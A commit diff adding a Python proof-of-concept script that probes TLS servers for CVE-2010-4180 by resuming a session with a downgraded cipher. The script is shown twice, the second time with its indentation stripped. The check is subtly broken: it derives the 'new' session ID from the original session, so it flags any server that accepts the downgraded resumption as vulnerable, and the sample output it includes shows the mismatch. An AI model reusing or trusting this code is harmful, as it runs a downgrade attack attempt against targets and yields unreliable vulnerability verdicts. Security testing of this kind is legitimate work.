milo2012 · May 25, 2022 12:03
diff --git a/CVE-2010-4180.py b/CVE-2010-4180.py
 '''
 #https://www.tenable.com/plugins/nessus/51892

 % python3 CVE-2010-4180.py -t x.x.x.x          
 [*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
 SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
    Session-ID-ctx: 
    Master-Key: 1DEAFF8A6C400FB1958751910F0E63451CA6662C3147C48AED7C68A45AC940C8939E2E6954A167B516578BBFCEC51576
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1614857820
    Timeout   : 7200 (sec)
    Verify return code: 20 (unable to get local issuer certificate)

 [*] Current Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522

 Accepted cipher suites for TLS_1_2:
 * TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256
 * TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
 * TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256
 * TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
 * TLS_RSA_WITH_ARIA_256_GCM_SHA384
 * TLS_RSA_WITH_ARIA_128_GCM_SHA256
 * TLS_RSA_WITH_AES_256_GCM_SHA384
 * TLS_RSA_WITH_AES_256_CCM_8
 * TLS_RSA_WITH_AES_256_CCM
 * TLS_RSA_WITH_AES_256_CBC_SHA256
 * TLS_RSA_WITH_AES_256_CBC_SHA
 * TLS_RSA_WITH_AES_128_GCM_SHA256
 * TLS_RSA_WITH_AES_128_CCM_8
 * TLS_RSA_WITH_AES_128_CCM
 * TLS_RSA_WITH_AES_128_CBC_SHA256
 * TLS_RSA_WITH_AES_128_CBC_SHA
 * TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
 * TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384
 * TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
 * TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384
 * TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256
 * TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
 * TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
 * TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
 * TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
 * TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
 * TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

 [*] Resuming session with downgraded cipher: CAMELLIA256-SHA
 SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : CAMELLIA256-SHA
    Session-ID: 9050C06AA9C2F039B2256275F044DE1EE7A9A0E41D1910645C1C7CAFCEEA3A45
    Session-ID-ctx: 
    Master-Key: 85724393381819731AD31C437D2354E689C2E64FC30617BA650984280BA124D92BC01560C934A5F7441B1643D305B656
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 1b 69 77 97 dc 86 6c 22-08 a3 fc 33 dd 05 7d 3f   .iw...l"...3..}?
    0010 - 4e c3 da 12 06 da 2a a8-5a 67 ff 33 4d 9e f3 31   N.....*.Zg.3M..1
    0020 - d8 03 d4 2f c9 03 f9 64-59 93 9a 16 58 64 f8 0a   .../...dY...Xd..
    0030 - ce c0 ab 67 0f 0d 27 e2-fe fa 70 c6 5d a9 96 0c   ...g..'...p.]...
    0040 - 19 b3 2e 1a 60 46 4a 63-ae a5 11 c6 a1 c6 66 b0   ....`FJc......f.
    0050 - fa ae 05 e7 21 3a 1b df-c7 78 f3 2b 1c 57 f3 32   ....!:...x.+.W.2
    0060 - d5 f3 fe 8c e2 bd 5d 3c-01 6b 35 aa 30 ac 48 53   ......]<.k5.0.HS
    0070 - 58 35 4c 17 8f 2d e8 12-7c 91 b7 a3 c1 96 8e da   X5L..-..|.......
    0080 - 35 17 f5 b3 9d 6d 9b b1-fd d6 e3 e6 65 09 81 69   5....m......e..i
    0090 - 64 cf 49 ad d0 8b 55 7e-ee fb f1 0a 31 1f b1 5d   d.I...U~....1..]
    00a0 - 0e 86 2e 4e 18 c5 bb ed-0e e7 d1 74 66 97 d8 41   ...N.......tf..A
    00b0 - 15 7a 7e dc db 38 27 55-d5 7d 37 2f 43 06 73 aa   .z~..8'U.}7/C.s.

    Start Time: 1614857837
    Timeout   : 7200 (sec)
    Verify return code: 20 (unable to get local issuer certificate)

 [*] New Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
 [+] x.x.x.x:443 is vulnerable to CVE-2010-4180
 '''

 from sslyze import (
    ServerNetworkLocationViaDirectConnection,
    ServerConnectivityTester,
    Scanner,
    ServerScanRequest,
    ScanCommand,
    ServerConnectivityInfo,
    TlsVersionEnum,
    ServerNetworkConfiguration,
    ServerTlsProbingResult,
    TlsVersionEnum,
    ClientAuthRequirementEnum,
 )
 from nassl import _nassl
 from nassl.legacy_ssl_client import LegacySslClient
 from sslyze.server_connectivity import ServerConnectivityInfo, TlsVersionEnum
 from sslyze.errors import ConnectionToServerFailed
 import nassl, sys, optparse, json, sslyze, os

 def getSupportedCiphers(server_info, tlsVer):
 	resList=[]
 	scanCmd=ScanCommand.TLS_1_0_CIPHER_SUITES
 	scanner = Scanner()
 	if tlsVer=="TLS_1_0":
 		scanCmd=ScanCommand.TLS_1_0_CIPHER_SUITES
 	if tlsVer=="TLS_1_1":
 		scanCmd=ScanCommand.TLS_1_1_CIPHER_SUITES
 	if tlsVer=="TLS_1_2":
 		scanCmd=ScanCommand.TLS_1_2_CIPHER_SUITES
 	
 	server_scan_req = ServerScanRequest(server_info=server_info, scan_commands={ScanCommand.CERTIFICATE_INFO, scanCmd},)
 	scanner.queue_scan(server_scan_req)
 	for server_scan_result in scanner.get_results():
 		try:
 			result = server_scan_result.scan_commands_results[scanCmd]
 			print("\nAccepted cipher suites for "+tlsVer+":")
 			for accepted_cipher_suite in result.accepted_cipher_suites:
 				print(f"* {accepted_cipher_suite.cipher_suite.name}")
 				resList.append(accepted_cipher_suite.cipher_suite.name)
 		except KeyError:
 			pass
 	return(resList)
 		
 def readJson(filename):
 	f = open(filename,"r")
 	text = f.read()
 	json_data = json.loads(text)
 	return(json_data)
 	
 def main(hostname,portNo) -> None:
 	filename="tlsdb.json"
 	if not os.path.exists(filename):
 		print("[-] "+filename+" is missing. Please download from https://raw.githubusercontent.com/tiran/tlsdb/master/tlsdb.json")
 		sys.exit()
 	cipherDBDict=readJson(filename)
 	cipherDBDict=cipherDBDict['ciphers']	
 	ssl_version_downgrade=''

 	tlsVer=""
 	ssl_session=None
 	tlsVerList=[]
 	tlsVerList.append(TlsVersionEnum.TLS_1_2)
 	tlsVerList.append(TlsVersionEnum.TLS_1_1)
 	tlsVerList.append(TlsVersionEnum.TLS_1_0)
 	for ssl_version_downgrade in tlsVerList:
 		try:
 			if "TLS_1_0" in str(ssl_version_downgrade):
 				tlsVer="TLS_1_0"
 			if "TLS_1_1" in str(ssl_version_downgrade):
 				tlsVer="TLS_1_1"
 			if "TLS_1_2" in str(ssl_version_downgrade):
 				tlsVer="TLS_1_2"
 			server_location = ServerNetworkLocationViaDirectConnection.with_ip_address_lookup(hostname, portNo)
 			final_network_config = ServerNetworkConfiguration.default_for_server_location(server_location)
 			server_info = ServerConnectivityTester().perform(server_location, final_network_config)	
 			currentCipher=server_info.tls_probing_result.cipher_suite_supported		
 			ssl_connection = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
 			ssl_connection.ssl_client.disable_stateless_session_resumption()
 			ssl_connection.connect()
 			print("[*] Connecting using Cipher: "+currentCipher)
 			ssl_session = ssl_connection.ssl_client.get_session() 
 			print(ssl_session.as_text())
 			tmpText=ssl_session.as_text()
 			tmpTextList=tmpText.split("\n")
 			for x in tmpTextList:
 				if "Cipher    : " in x:
 					y=x.split("Cipher    :")[1]
 					y=y.strip()
 					currentCipher=y
 			session_string = ((ssl_session.as_text()).split("Session-ID:"))[1]
 			session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
 			print("[*] Current Session_id: "+session_id)
 			ssl_connection.close()
 			break
 		except sslyze.errors.ServerRejectedTlsHandshake as e:			
 			pass
 	supportedCipherList=getSupportedCiphers(server_info,tlsVer)
 	if len(supportedCipherList)>0:
 		cipherDBDict1={}
 		supportedCipher=""	
 		for i in sorted(cipherDBDict): 
 			x=cipherDBDict[i]
 			nssName=x['nss']
 			opensslName=x['openssl']
 			cipherDBDict1[nssName]=opensslName
 		chosenCipher=""
 		for x in supportedCipherList:
 			if currentCipher!=x:
 				try:
 					if cipherDBDict1[x]!=currentCipher:
 						chosenCipher=cipherDBDict1[x]
 						break
 				except KeyError:
 					continue
 	
 		try:
 			print("\n[*] Resuming session with downgraded cipher: "+chosenCipher)
 			tls_probing_result=ServerTlsProbingResult(highest_tls_version_supported=ssl_version_downgrade,cipher_suite_supported=chosenCipher,client_auth_requirement=ClientAuthRequirementEnum.DISABLED,supports_ecdh_key_exchange=False)
 			server_info = ServerConnectivityInfo(server_location, final_network_config, tls_probing_result)
 			ssl_connection1 = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
 			ssl_connection1.ssl_client.set_session(ssl_session)
 			ssl_connection.ssl_client.disable_stateless_session_resumption()
 			ssl_connection1.ssl_client.set_cipher_list(chosenCipher)
 			ssl_connection1.connect()
 			new_session = ssl_connection1.ssl_client.get_session() 
 			print(new_session.as_text())
 			session_string = ((ssl_session.as_text()).split("Session-ID:"))[1]
 			new_session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
 			print("[*] New Session_id: "+new_session_id)
 			if session_id==new_session_id:
 				print("[+] "+hostname+":"+str(portNo)+" is vulnerable to CVE-2010-4180")
 			ssl_connection1.close()
 		except sslyze.errors.ServerRejectedTlsHandshake:
 			print("[-] "+hostname+":"+str(portNo)+" is NOT vulnerable to CVE-2010-4180")
 		except nassl._nassl.OpenSSLError:
 			print("[-] "+hostname+":"+str(portNo)+" is NOT vulnerable to CVE-2010-4180")

 parser = optparse.OptionParser()
 parser.add_option('-t','--target', action="store", dest="targetIP", help="target server (e.g. 4.2.2.2:443)")
 options, remainder = parser.parse_args()
 if not options.targetIP:
 	print("[-] Please provide the -t or --target argument")
 	sys.exit()
 else:
 	if ":" not in (options.targetIP):
 		hostname=options.targetIP
 		portNo="443"
 		main(hostname,portNo)
 	else:
 		x=(options.targetIP).split(":")
 		hostname=x[0]
 		portNo=x[1]
 		main(hostname,portNo)
	'''
	#https://www.tenable.com/plugins/nessus/51892

	% python3 CVE-2010-4180.py -t x.x.x.x
	[*] Connecting using Cipher: ECDHE-RSA-AES256-GCM-SHA384
	SSL-Session:
	Protocol : TLSv1.2
	Cipher : ECDHE-RSA-AES256-GCM-SHA384
	Session-ID: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
	Session-ID-ctx:
	Master-Key: 1DEAFF8A6C400FB1958751910F0E63451CA6662C3147C48AED7C68A45AC940C8939E2E6954A167B516578BBFCEC51576
	Key-Arg : None
	PSK identity: None
	PSK identity hint: None
	SRP username: None
	Start Time: 1614857820
	Timeout : 7200 (sec)
	Verify return code: 20 (unable to get local issuer certificate)

	[*] Current Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522

	Accepted cipher suites for TLS_1_2:
	* TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256
	* TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
	* TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256
	* TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
	* TLS_RSA_WITH_ARIA_256_GCM_SHA384
	* TLS_RSA_WITH_ARIA_128_GCM_SHA256
	* TLS_RSA_WITH_AES_256_GCM_SHA384
	* TLS_RSA_WITH_AES_256_CCM_8
	* TLS_RSA_WITH_AES_256_CCM
	* TLS_RSA_WITH_AES_256_CBC_SHA256
	* TLS_RSA_WITH_AES_256_CBC_SHA
	* TLS_RSA_WITH_AES_128_GCM_SHA256
	* TLS_RSA_WITH_AES_128_CCM_8
	* TLS_RSA_WITH_AES_128_CCM
	* TLS_RSA_WITH_AES_128_CBC_SHA256
	* TLS_RSA_WITH_AES_128_CBC_SHA
	* TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
	* TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384
	* TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256
	* TLS_ECDHE_RSA_WITH_ARIA_256_GCM_SHA384
	* TLS_ECDHE_RSA_WITH_ARIA_128_GCM_SHA256
	* TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
	* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
	* TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
	* TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	* TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
	* TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

	[*] Resuming session with downgraded cipher: CAMELLIA256-SHA
	SSL-Session:
	Protocol : TLSv1.2
	Cipher : CAMELLIA256-SHA
	Session-ID: 9050C06AA9C2F039B2256275F044DE1EE7A9A0E41D1910645C1C7CAFCEEA3A45
	Session-ID-ctx:
	Master-Key: 85724393381819731AD31C437D2354E689C2E64FC30617BA650984280BA124D92BC01560C934A5F7441B1643D305B656
	Key-Arg : None
	PSK identity: None
	PSK identity hint: None
	SRP username: None
	TLS session ticket lifetime hint: 300 (seconds)
	TLS session ticket:
	0000 - 1b 69 77 97 dc 86 6c 22-08 a3 fc 33 dd 05 7d 3f .iw...l"...3..}?
	0010 - 4e c3 da 12 06 da 2a a8-5a 67 ff 33 4d 9e f3 31 N.....*.Zg.3M..1
	0020 - d8 03 d4 2f c9 03 f9 64-59 93 9a 16 58 64 f8 0a .../...dY...Xd..
	0030 - ce c0 ab 67 0f 0d 27 e2-fe fa 70 c6 5d a9 96 0c ...g..'...p.]...
	0040 - 19 b3 2e 1a 60 46 4a 63-ae a5 11 c6 a1 c6 66 b0 ....`FJc......f.
	0050 - fa ae 05 e7 21 3a 1b df-c7 78 f3 2b 1c 57 f3 32 ....!:...x.+.W.2
	0060 - d5 f3 fe 8c e2 bd 5d 3c-01 6b 35 aa 30 ac 48 53 ......]<.k5.0.HS
	0070 - 58 35 4c 17 8f 2d e8 12-7c 91 b7 a3 c1 96 8e da X5L..-..\|.......
	0080 - 35 17 f5 b3 9d 6d 9b b1-fd d6 e3 e6 65 09 81 69 5....m......e..i
	0090 - 64 cf 49 ad d0 8b 55 7e-ee fb f1 0a 31 1f b1 5d d.I...U~....1..]
	00a0 - 0e 86 2e 4e 18 c5 bb ed-0e e7 d1 74 66 97 d8 41 ...N.......tf..A
	00b0 - 15 7a 7e dc db 38 27 55-d5 7d 37 2f 43 06 73 aa .z~..8'U.}7/C.s.

	Start Time: 1614857837
	Timeout : 7200 (sec)
	Verify return code: 20 (unable to get local issuer certificate)

	[*] New Session_id: 9B36462FA6870CB80E916C0C1B0760D7946EA6464462B8ADF269D38BF1EAC522
	[+] x.x.x.x:443 is vulnerable to CVE-2010-4180
	'''

	from sslyze import (
	ServerNetworkLocationViaDirectConnection,
	ServerConnectivityTester,
	Scanner,
	ServerScanRequest,
	ScanCommand,
	ServerConnectivityInfo,
	TlsVersionEnum,
	ServerNetworkConfiguration,
	ServerTlsProbingResult,
	TlsVersionEnum,
	ClientAuthRequirementEnum,
	)
	from nassl import _nassl
	from nassl.legacy_ssl_client import LegacySslClient
	from sslyze.server_connectivity import ServerConnectivityInfo, TlsVersionEnum
	from sslyze.errors import ConnectionToServerFailed
	import nassl, sys, optparse, json, sslyze, os

	def getSupportedCiphers(server_info, tlsVer):
	resList=[]
	scanCmd=ScanCommand.TLS_1_0_CIPHER_SUITES
	scanner = Scanner()
	if tlsVer=="TLS_1_0":
	scanCmd=ScanCommand.TLS_1_0_CIPHER_SUITES
	if tlsVer=="TLS_1_1":
	scanCmd=ScanCommand.TLS_1_1_CIPHER_SUITES
	if tlsVer=="TLS_1_2":
	scanCmd=ScanCommand.TLS_1_2_CIPHER_SUITES

	server_scan_req = ServerScanRequest(server_info=server_info, scan_commands={ScanCommand.CERTIFICATE_INFO, scanCmd},)
	scanner.queue_scan(server_scan_req)
	for server_scan_result in scanner.get_results():
	try:
	result = server_scan_result.scan_commands_results[scanCmd]
	print("\nAccepted cipher suites for "+tlsVer+":")
	for accepted_cipher_suite in result.accepted_cipher_suites:
	print(f"* {accepted_cipher_suite.cipher_suite.name}")
	resList.append(accepted_cipher_suite.cipher_suite.name)
	except KeyError:
	pass
	return(resList)

	def readJson(filename):
	f = open(filename,"r")
	text = f.read()
	json_data = json.loads(text)
	return(json_data)

	def main(hostname,portNo) -> None:
	filename="tlsdb.json"
	if not os.path.exists(filename):
	print("[-] "+filename+" is missing. Please download from https://raw.githubusercontent.com/tiran/tlsdb/master/tlsdb.json")
	sys.exit()
	cipherDBDict=readJson(filename)
	cipherDBDict=cipherDBDict['ciphers']
	ssl_version_downgrade=''

	tlsVer=""
	ssl_session=None
	tlsVerList=[]
	tlsVerList.append(TlsVersionEnum.TLS_1_2)
	tlsVerList.append(TlsVersionEnum.TLS_1_1)
	tlsVerList.append(TlsVersionEnum.TLS_1_0)
	for ssl_version_downgrade in tlsVerList:
	try:
	if "TLS_1_0" in str(ssl_version_downgrade):
	tlsVer="TLS_1_0"
	if "TLS_1_1" in str(ssl_version_downgrade):
	tlsVer="TLS_1_1"
	if "TLS_1_2" in str(ssl_version_downgrade):
	tlsVer="TLS_1_2"
	server_location = ServerNetworkLocationViaDirectConnection.with_ip_address_lookup(hostname, portNo)
	final_network_config = ServerNetworkConfiguration.default_for_server_location(server_location)
	server_info = ServerConnectivityTester().perform(server_location, final_network_config)
	currentCipher=server_info.tls_probing_result.cipher_suite_supported
	ssl_connection = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
	ssl_connection.ssl_client.disable_stateless_session_resumption()
	ssl_connection.connect()
	print("[*] Connecting using Cipher: "+currentCipher)
	ssl_session = ssl_connection.ssl_client.get_session()
	print(ssl_session.as_text())
	tmpText=ssl_session.as_text()
	tmpTextList=tmpText.split("\n")
	for x in tmpTextList:
	if "Cipher : " in x:
	y=x.split("Cipher :")[1]
	y=y.strip()
	currentCipher=y
	session_string = ((ssl_session.as_text()).split("Session-ID:"))[1]
	session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
	print("[*] Current Session_id: "+session_id)
	ssl_connection.close()
	break
	except sslyze.errors.ServerRejectedTlsHandshake as e:
	pass
	supportedCipherList=getSupportedCiphers(server_info,tlsVer)
	if len(supportedCipherList)>0:
	cipherDBDict1={}
	supportedCipher=""
	for i in sorted(cipherDBDict):
	x=cipherDBDict[i]
	nssName=x['nss']
	opensslName=x['openssl']
	cipherDBDict1[nssName]=opensslName
	chosenCipher=""
	for x in supportedCipherList:
	if currentCipher!=x:
	try:
	if cipherDBDict1[x]!=currentCipher:
	chosenCipher=cipherDBDict1[x]
	break
	except KeyError:
	continue

	try:
	print("\n[*] Resuming session with downgraded cipher: "+chosenCipher)
	tls_probing_result=ServerTlsProbingResult(highest_tls_version_supported=ssl_version_downgrade,cipher_suite_supported=chosenCipher,client_auth_requirement=ClientAuthRequirementEnum.DISABLED,supports_ecdh_key_exchange=False)
	server_info = ServerConnectivityInfo(server_location, final_network_config, tls_probing_result)
	ssl_connection1 = server_info.get_preconfigured_tls_connection(override_tls_version=ssl_version_downgrade, should_use_legacy_openssl=True)
	ssl_connection1.ssl_client.set_session(ssl_session)
	ssl_connection.ssl_client.disable_stateless_session_resumption()
	ssl_connection1.ssl_client.set_cipher_list(chosenCipher)
	ssl_connection1.connect()
	new_session = ssl_connection1.ssl_client.get_session()
	print(new_session.as_text())
	session_string = ((ssl_session.as_text()).split("Session-ID:"))[1]
	new_session_id = (session_string.split("Session-ID-ctx:"))[0].strip()
	print("[*] New Session_id: "+new_session_id)
	if session_id==new_session_id:
	print("[+] "+hostname+":"+str(portNo)+" is vulnerable to CVE-2010-4180")
	ssl_connection1.close()
	except sslyze.errors.ServerRejectedTlsHandshake:
	print("[-] "+hostname+":"+str(portNo)+" is NOT vulnerable to CVE-2010-4180")
	except nassl._nassl.OpenSSLError:
	print("[-] "+hostname+":"+str(portNo)+" is NOT vulnerable to CVE-2010-4180")

	parser = optparse.OptionParser()
	parser.add_option('-t','--target', action="store", dest="targetIP", help="target server (e.g. 4.2.2.2:443)")
	options, remainder = parser.parse_args()
	if not options.targetIP:
	print("[-] Please provide the -t or --target argument")
	sys.exit()
	else:
	if ":" not in (options.targetIP):
	hostname=options.targetIP
	portNo="443"
	main(hostname,portNo)
	else:
	x=(options.targetIP).split(":")
	hostname=x[0]
	portNo=x[1]
	main(hostname,portNo)